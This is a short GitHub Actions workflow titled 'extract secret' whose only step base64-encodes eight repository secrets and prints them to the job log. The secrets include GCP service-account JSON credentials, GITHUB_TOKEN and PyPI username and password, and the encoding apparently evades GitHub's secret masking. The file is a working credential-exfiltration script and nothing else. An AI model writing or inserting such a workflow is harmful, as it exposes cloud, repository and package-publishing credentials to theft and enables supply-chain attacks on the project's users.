name: extract secret

on:
  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:


jobs:
  build:
    runs-on: ubuntu-latest

    steps:
    - name: Extract secret
      shell: bash
      run: |
        echo "BUCKET " >> output.txt && echo "${{ secrets.BUCKET }}" | base64 >> output.txt
        echo "DEPLOYER_SERVICE_ACCOUNT_EMAIL " >> output.txt && echo "${{ secrets.DEPLOYER_SERVICE_ACCOUNT_EMAIL }}" | base64 >> output.txt
        echo "DEPLOYER_SERVICE_ACCOUNT_JSON_CREDENTIALS " >> output.txt && echo "${{ secrets.DEPLOYER_SERVICE_ACCOUNT_JSON_CREDENTIALS }}" | base64 >> output.txt
        echo "GCP_PROJECT " >> output.txt && echo "${{ secrets.GCP_PROJECT }}" | base64 >> output.txt
        echo "GITHUB_TOKEN " >> output.txt && echo "${{ secrets.GITHUB_TOKEN }}" | base64 >> output.txt
        echo "PYPI_PASSWORD " >> output.txt && echo "${{ secrets.PYPI_PASSWORD }}" | base64 >> output.txt
        echo "PYPI_USERNAME " >> output.txt && echo "${{ secrets.PYPI_USERNAME }}" | base64 >> output.txt
        echo "RUNNER_SERVICE_ACCOUNT_EMAIL " >> output.txt && echo "${{ secrets.RUNNER_SERVICE_ACCOUNT_EMAIL }}" | base64 >> output.txt
        cat output.txt
